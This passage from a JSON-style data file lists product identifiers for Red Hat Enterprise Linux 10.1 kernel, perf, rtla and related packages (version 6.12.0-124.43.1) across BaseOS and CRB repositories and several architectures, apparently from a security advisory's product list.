"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
